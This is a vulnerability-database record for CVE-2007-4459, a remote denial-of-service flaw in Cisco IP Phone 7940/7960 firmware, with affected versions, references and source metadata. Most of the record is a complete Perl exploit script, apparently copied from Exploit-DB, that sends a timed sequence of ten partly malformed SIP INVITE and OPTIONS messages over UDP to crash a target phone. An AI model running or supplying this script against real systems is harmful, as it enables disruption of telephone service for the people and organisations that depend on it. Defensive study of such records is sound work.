ID

VAR-E-200708-0245


CVE

cve_id:CVE-2007-4459

Trust: 1.3

sources: BID: 25378 // EXPLOIT-DB: 4298

EDB ID

4298


TITLE

Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 4298

DESCRIPTION

Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service. CVE-2007-4459 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 4298

AFFECTED PRODUCTS

vendor:ciscomodel:ip phonescope:eqversion:7940

Trust: 1.0

vendor:ciscomodel:voip phone cp-7960scope:eqversion:3.2

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:eqversion:3.1

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:eqversion:3.0

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:eqversion:8.6(0)

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:3.2

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:3.1

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:3.0

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:8.6(0)

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:neversion:8.7(0)

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:neversion:8.7(0)

Trust: 0.3

sources: BID: 25378 // EXPLOIT-DB: 4298

EXPLOIT

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless ($ARGV[3]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n";

$socket->send($msg);

sleep(8.2);

$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

sleep(1.5);

$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

sleep(3.3);

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n";

$socket->send($msg);

sleep(4);

$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

sleep(4);

$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

sleep(12);

$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

sleep(3);

$msg = "INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=08\r\nTo: <sip:7440-2\@$ARGV[0]>\r\nContact: <sip:tucu\@$ARGV[3]>\r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n";

$socket->send($msg);

sleep(3);

$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

sleep(3);

$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

# milw0rm.com [2007-08-21]

Trust: 1.0

sources: EXPLOIT-DB: 4298

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 4298

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 4298

TYPE

10 SIP Messages Remote Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 4298

CREDITS

MADYNES

Trust: 0.6

sources: EXPLOIT-DB: 4298

EXTERNAL IDS

db:EXPLOIT-DBid:4298

Trust: 1.6

db:NVDid:CVE-2007-4459

Trust: 1.3

db:EDBNETid:28618

Trust: 0.6

db:BIDid:25378

Trust: 0.3

sources: BID: 25378 // EXPLOIT-DB: 4298 // EDBNET: 28618

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2007-4459

Trust: 1.0

url:https://www.exploit-db.com/exploits/4298/

Trust: 0.6

url:http://www.cisco.com/en/us/products/products_security_response09186a00808a6693.html

Trust: 0.3

url:http://www.cisco.com/en/us/products/hw/phones/ps379/index.html

Trust: 0.3

sources: BID: 25378 // EXPLOIT-DB: 4298 // EDBNET: 28618

SOURCES

db:BIDid:25378
db:EXPLOIT-DBid:4298
db:EDBNETid:28618

LAST UPDATE DATE

2022-07-27T09:17:11.666000+00:00


SOURCES UPDATE DATE

db:BIDid:25378date:2015-04-16T18:09:00

SOURCES RELEASE DATE

db:BIDid:25378date:2007-08-20T00:00:00
db:EXPLOIT-DBid:4298date:2007-08-21T00:00:00
db:EDBNETid:28618date:2007-08-21T00:00:00